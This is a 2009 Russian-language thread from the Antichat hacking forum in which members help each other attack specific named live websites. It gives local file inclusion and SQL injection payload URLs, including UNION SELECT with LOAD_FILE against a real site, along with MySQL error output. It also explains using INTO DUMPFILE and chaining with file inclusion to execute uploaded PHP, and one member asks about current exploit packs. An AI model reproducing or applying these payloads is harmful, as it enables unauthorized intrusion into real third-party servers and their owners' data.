HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.07.2009, 13:53
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Pavlov, hex не поможет тут...
Byrger, если ты и сможешь подделать IP, всеравно экранировка кавычки произойдет.

Последний раз редактировалось mailbrush; 26.07.2009 в 13:56..
 
Ответить с цитированием

  #2  
Старый 26.07.2009, 18:57
Assembler
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
С нами: 9838057

Репутация: 302
По умолчанию

http://www.acumenin.com/index.php?p=../index.php

Можно ли что нить придумать дальше? Не силен в инклюдах =(
 
Ответить с цитированием

  #3  
Старый 26.07.2009, 19:17
S00pY
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами: 10025299

Репутация: 412
По умолчанию

Можно.... Например записать в сессию пхп код... далее инклудить его.
Поискать возможности заливки файла для дальнейшего инклуда и тд. и тп.
 
Ответить с цитированием

  #4  
Старый 27.07.2009, 18:07
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами: 8947056

Репутация: 229
По умолчанию

Всем здрасти...
Есть скул
При попытке проверить ее таким способом 10-1 (должна вывестить 9 новость)
Выводится 10 новость... Значит наврятли можно чего сделать, при попытке подставить ковычку это лезет:

1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'union+select+1,2,3,4,5,6,7,8--' and pd.products_id = ''+union+select+1,2,3,4,5,6' at line 1

Выплеск запроса(оставил важное токо):where p.products_id = ''+union+select+1,2,3,4,5,6--' and pd.products_id = ''+union+select+1,2,3,4,5,6--' and pd.language_id = '2'

(1,2,3,4... мое, пробывал подобрать)(запрос был таким, id='+union+select+1,2,3,4,5,6--)

При заменне плюсеков на пробелы вылазиет след. ошибка:

1109 - Unknown table 'pd' in field list

(значит внедрение запроса по идее возможно)

Как тут быть? Скул в локалке. Пробывал разные комменты (--,/*, -- ) но не помогает
 
Ответить с цитированием

  #5  
Старый 27.07.2009, 20:56
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Может быть int();
Или жёсткая фильтрация.
Скорее всего 2.
 
Ответить с цитированием

  #6  
Старый 28.07.2009, 09:08
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами: 9154406

Репутация: 2221


По умолчанию

Ты же сохранил в /tmp/phpinfo.php
А читаешь /tmp/phpinfo
 
Ответить с цитированием

  #7  
Старый 28.07.2009, 09:20
nub-hacker
Banned
Регистрация: 23.06.2009
Сообщений: 89
С нами: 8886744

Репутация: -67
По умолчанию

Цитата:
Сообщение от Ctacok  
Ты же сохранил в /tmp/phpinfo.php
А читаешь /tmp/phpinfo
я всё правильно делал,просто описался. ты хоть сам бы по пробовал залить прежде чем писать.
 
Ответить с цитированием

  #8  
Старый 28.07.2009, 11:11
Flair
Познающий
Регистрация: 07.05.2009
Сообщений: 70
С нами: 8954316

Репутация: 38
По умолчанию

какая связка сплоитов щас актуальней?
 
Ответить с цитированием

  #9  
Старый 28.07.2009, 12:54
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

nub-hacker
Код:
потом

пытаюсь открыть

http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9--

нифига не раб. помогите плиз.
почему не работает, как раз всё прекрасно в папку tmp залилось, что можнно проверить, пройдя по твоей последней ссылке:
Код:
http://www.ipanel.tv/job/index.php?id=1+and+1=0+union+select+1,LOAD_FILE('/tmp/phpinfo.php'),3,4,5,6,7,8,9--
посмотреть сорцы страницы, CTRL+F "<?", и ты увидишь там свой "<?phpinfo();?>"

Просто сначала ты писал "читалка", а потом почему-то ждешь исполнения того, что загрузил. На самом деле через SQL-inj то, что загрузил - то просто сможешь также ПРОЧИТАТЬ.

Чтобы файло, загруженное через скулю заработало, его (файло) надо загружать в папку, доступную из веба (т.е. чтобы можно было набрать к нему путь в адресной строке браузера), но для этого необходимы 2 условия:

1. Знать полный абсолютный путь к серверу (а не просто /tmp, которая просто является фактическим тестом рабочести load_file). Папка "/tmp"Не всегда бывает доступна на запись, что часто многих начинающих сбивает с толку и они бросают такие скули.

2. Папка должна быть доступна на запись

ЗЫЖ Ну или как ты, в /tmp, но потом искать LFI, чтобы из этой /tmp проинклудить (читай - выполнить) твой phpinfo.php

Последний раз редактировалось Pashkela; 28.07.2009 в 13:08..
 
Ответить с цитированием

  #10  
Старый 28.07.2009, 13:03
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами: 9030566

Репутация: 2017


По умолчанию

:O мой пост и мою скуль крутишь

1)load_file - это чтение исходного кода файла
2)+into+DUMPFILE+'/tmp/phpinfo.php'-- что бы это использовать надо иметь тебе инклуд
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...